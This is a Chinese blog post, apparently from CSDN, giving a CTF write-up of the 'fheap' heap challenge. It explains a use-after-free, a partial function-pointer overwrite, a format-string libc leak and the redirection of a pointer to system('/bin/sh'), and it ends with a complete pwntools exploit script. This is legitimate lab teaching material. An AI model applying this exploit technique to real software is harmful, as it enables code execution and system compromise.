CTF-PWN-堆-【use after free-2】

已于 2023-12-20 16:50:37 修改
阅读量1k 收藏 22
点赞数 23
分类专栏: CTF-PWN-堆+IO 文章标签: PWN
于 2023-12-20 16:48:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llovewuzhengzi/article/details/135112213
版权

文章目录

fheap libc 2.23 64位

检查

在这里插入图片描述

main

多层while,其实和选择也差不多
在这里插入图片描述

create

分配0x20的堆,指针赋值给ptr
首先输入size大小
然后输入到buf当中
再看实际的buf的有多少,如果大于15就用malloc分配实际长度的堆,其指针为dest,然后将buf的内容复制进去,同时更新ptr里的内容,前八个字节为dest的值然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free两次,先free存储内容的指针,再free原ptr指针
如果小于15,就直接将buf的内容赋值到ptr的开始部分,然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free一次
最后将遍历unk_2020c0数组 ,每个数组元素16个字节,前八个字节赋值为1,后八个字节赋值为ptr
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

delete

先根据索引检查unk_2020c0后24个字节是否为值,有值则存在这个string,然后输入yes后调用ptr中的free函数,参数为ptr,最后将此时索引的unk_2020c0前八个字节设置为0在这里插入图片描述

思路

依然存在use after free漏洞,可以使得create时能得到可以修改原来存储string相关信息的堆中的存储函数指针的内容

首先create两次,此时只有两个堆,都是0x20,且都存储string的相关信息(delete时的调用的函数指针),然后申请一个大小0x20的string,此时可利用格式化字符串泄露某个函数的地址,然后得到libc基地址,然后再得到system的地址
然后delete该申请的string 再次create此时可以重写之前一开始id为1的堆块内容中的函数指针,此时为system的函数地址,并且刚该开始的堆内容为/bin/sh,此时再次delete(1)即可成功getshell

覆盖目标函数的指针

选用printf函数指针
函数装入内存时,由于地址随机化不会影响到低12位的值,此时可能可以成功覆盖到目的函数
在这里插入图片描述

在这里插入图片描述

printf内部

test指令(按位与)检查如果不是零就会执行movaps

movaps指令处理的内存位置必须是十六字节对齐的

如果不是零,就没有跳转,那么会执行movaps,满足十六字节对齐比较麻烦
所以我们先通过执行前面的存在的赋值ax为零的指令即可
在这里插入图片描述

调用覆盖的函数前

在这里插入图片描述

EAX与AX不是独立的,EAX是32位的寄存器,而AX是EAX的低16位。
举例来说
mov eax, 12345678h
那么AX将会是eax的低16位,也就是5678h。
而如果此时
mov ax,3344h
那么eax的值将变为12343344h,所以对ax的赋值是会影响eax的。
同样,AH是ax的高8位,而AL是ax的低8位,这就是说ah为33h,al为44h。

跳转后先执行mov eax,0
在这里插入图片描述

调用 printf时的栈

在这里插入图片描述
栈的第172个是libc_start_main+240

在这里插入图片描述

实际去的函数的地方

所以此时还需输入,此时想直接跳过这个地方输入只要输入一次-1就好了
在这里插入图片描述

查找当前版本对应的libc_start_main和system

在这里插入图片描述
在这里插入图片描述

计算出system的libc基地址

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

exp

from pwn import *
context(os="linux",arch="amd64",log_level="debug")
s=process("./pwn-f")
libc=ELF("./libc-2.23.so")
f=ELF("./pwn-f")
# gdb.attach(s,"b main")

def create(size,string):
    s.sendlineafter(b"3.quit\n",b"create ")
    s.sendlineafter(b"Pls give string size:",str(size))
    s.sendafter(b"str:",string)# 注意此时不能用sendlineafter,内容中会在后面有一个换行府,在覆盖函数底地址会多覆盖一个字节

def delete(id):
    s.sendlineafter(b"3.quit\n",b"delete ")
    s.sendlineafter(b"id:",str(id))
    s.sendlineafter(b"Are you sure?:",b"yes")


create(8, "ab") 
create(8, "ab") 

delete(1)
delete(0)

create(0x20, b'_libc_s_m+240:%176$pend'.ljust(0x18, b'c') + p8(0xB6))  # 0

delete(1)

s.recvuntil(b"_libc_s_m+240:")
libc_start_main_240= s.recvuntil("end", drop=True) # False是包括end

print(type(libc_start_main_240))
libc_start_main_240=int(libc_start_main_240,16) # 0x 形式的字节的转化为16进制数

system_addr = libc_start_main_240-240-0x20750+0x453a0

print("__libc_start_main_240: " + hex(libc_start_main_240))
print("system address: " + hex(system_addr))

s.sendline("-1")
delete(0)

create(0x20, b"/bin/sh;".ljust(24, b"p") + p64(system_addr))

delete(1)

s.interactive()
看星猩的柴狗
关注
  • 23
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
pwn学习——UseAfterFree hacknote
MrTreebook的博客
11-28 253
pwn学习——UseAfterFree hacknote1. 反编译看一下源代码2.add_note3.print_note4.del_note5.exp6.运行结果 1. 反编译看一下源代码 可以看到大概有四个功能 add del print menu 另外还有后门函数magic 2.add_note 可以看到在添加note的时候,每一个note有两个部分 第一个部份是一个put函数 第二个部分存放的是real_content 一个note节点内部结构是这样的 3.print_note 调用pu
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
Use After Free
kelxLZ的博客
07-05 1667
Author:ZERO-A-ONE Date:2021-07-05 一、概念 Use after free:顾名思义,某块内存在释放后还能被用户使用;一般存在于,free后没有将指针置为NULL,导致野指针的存在 二、例题 2.1 hacknote 我们先检查一下这个程序 (base) syc@ubuntu:~/Desktop/unlink/hacknote$ checksec hacknote [*] '/home/syc/Desktop/unlink/hacknote/hacknote' .
[pwn]Use After Free
Breeze的博客
09-06 8589
Use After Free:time_formatter writeup UAF漏洞就是Use After Free,再释放后继续使用,Use After Free会引发各种奇怪的现象,根据场景的不同并没有一种统一的利用方式。下面看题目:time_formatter 日常惯例,先查看安全策略: 开启了canary、NX、ASLR,然后查看一下程序逻辑: 很常见的菜单,下面查看一下各种功能:...
pwn 入门之use after free
清霂的博客
04-11 144
目录hacknote hacknote #!/usr/bin/env python2 from pwn import * arch = "i386" filename = "hacknote" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc def add(i,size,content): io.sendline('1')
CTF-PWN--【use after free-1】
llovewuzhengzi的博客
12-19 1074
再看实际的buf的有多少,如果大于15就用malloc分配实际长度的,其指针为dest,然后将buf的内容复制进去,同时更新ptr里的内容,前八个字节为dest的值然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free两次,先free存储内容的指针,再free原ptr指针。notelist数组存储着malloc分配的8字节的节点指针,每个节点指针有两个元素,一个是put函数,另一个是对应malloc分配的节点内容的指针,节点内容的大小由输入决定。简单的输入然后根据输入的数字有不同功能。
ctf-pwn--调试
xy_369的博客
05-20 413
写这篇文章的目的是更好地去理解,不要只停留在理论知识阶段注:读这篇文章需要一定基础,不然读起来很费劲或读不懂,要是有ctf-pwn手的基本基础,只是缺乏这一块的知识,可以先把这篇文章读完,大致了解哪些地方写了哪些知识点,同时结合一些相关的链接去快速掌握在计算机内存中的运作方式。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
b050闲置图书分享-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-23
本次开发的闲置图书分享平台实现了收货地址管理、字典管理、公告管理、留言板管理、图书管理、图书收藏管理、图书评价管理、图书订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让闲置图书分享平台更能从理念走到现实,确确实实的让人们提升信息处理效率。 管理图书的数据,此页面主要实现图书的增加、修改、删除、查看的功能。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑更新,失效的公告类型信息也能让管理员快速删除。
《大学生职业生涯规划与就业指导》大一阶段课程作业
最新发布
07-24
《大学生职业生涯规划与就业指导》大一阶段课程作业
开题报告潮汕特产直销系统 已通过开题答辩的.doc
07-23
随着互联网的高速发展,人们的生活方式发生了翻天覆地的变化,在过去,人们想要购买很远地方的东西会非常麻烦,因为是通信和交通都不是十分的方便,而现在网络购物成为了人们日常生活中不可或缺的一部分。在这样的背景下,互联网与传统行业的融合已经成为了一种不可阻挡的趋势。对于中国特色的潮汕特产来说,这一趋势也带来了巨大的变革和发展机遇[1]。
Python性能优化:掌握性能分析工具的实战指南
07-23
Python是一种广泛使用的高级编程语言,由Guido van Rossum于1989年底发明,第一个公开发行版发行于1991年。Python的设计哲学强调代码的可读性和简洁的语法(尤其是使用空格缩进来区分代码块,而不是使用大括号或关键词)。这使得Python被认为是一种易于学习的语言,同时具备强大的功能,适合初学者和经验丰富的程序员。 Python的主要特点包括: 1. **易于学习**:Python有相对较少的关键字,结构简单,和一个明确定义的语法。 2. **易于阅读**:Python代码定义的清晰度使得它像可执行伪代码。 3. **易于维护**:Python的成功在于它的源代码是相当容易维护的。 4. **广泛的标准库**:Python的标凑库很庞大,包含用于互联网通信、网络通信、数据压缩、加密、系统管理等的模块。 5. **跨平台**:Python可以在多种操作系统上运行,包括但不限于Windows、Mac OS X、Linux等。 6. **解释型语言**:Python是一种解释型语言,这意味着开发过程中没有编译步骤。 7. **动态类型系统**:Python不会在编写
Android学习系列之gradle实战
07-23
Android学习系列之gradle实战
RFC 3261中文版技术文档
07-23
**标题与描述解析** 标题"RFC 3261 中文文档"指的是互联网请求评论(Request for Comments)3261的中文版本。RFC 3261是互联网工程任务组(IETF)发布的一个重要标准,它定义了SIP(Session Initiation Protocol,会话初始协议)的核心规范。SIP是一种用于建立、修改和终止多媒体通信会话的协议,广泛应用于VoIP(Voice over IP,IP语音)和统一通信系统中。 描述同样简洁明了,只强调了这是RFC 3261的中文翻译,意味着对于中文读者来说,这个文档提供了一个理解SIP协议的中文语言资源。 **标签解析** "RFC3261 中文"标签进一步确认了文档的内容,表明这是关于RFC 3261的中文资料,便于搜索和分类。 **压缩包子文件的文件名称列表** 文件名为"RFC3261 中文.mht",这是一个单一网页文件,通常包含HTML、图像和其他资源,用于保存完整的网页内容。用户可以通过打开这个文件来查看RFC 3261的中文翻译。 **SIP协议详述** SIP协议是基于文本的,其设计类似于HTTP
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看星猩的柴狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值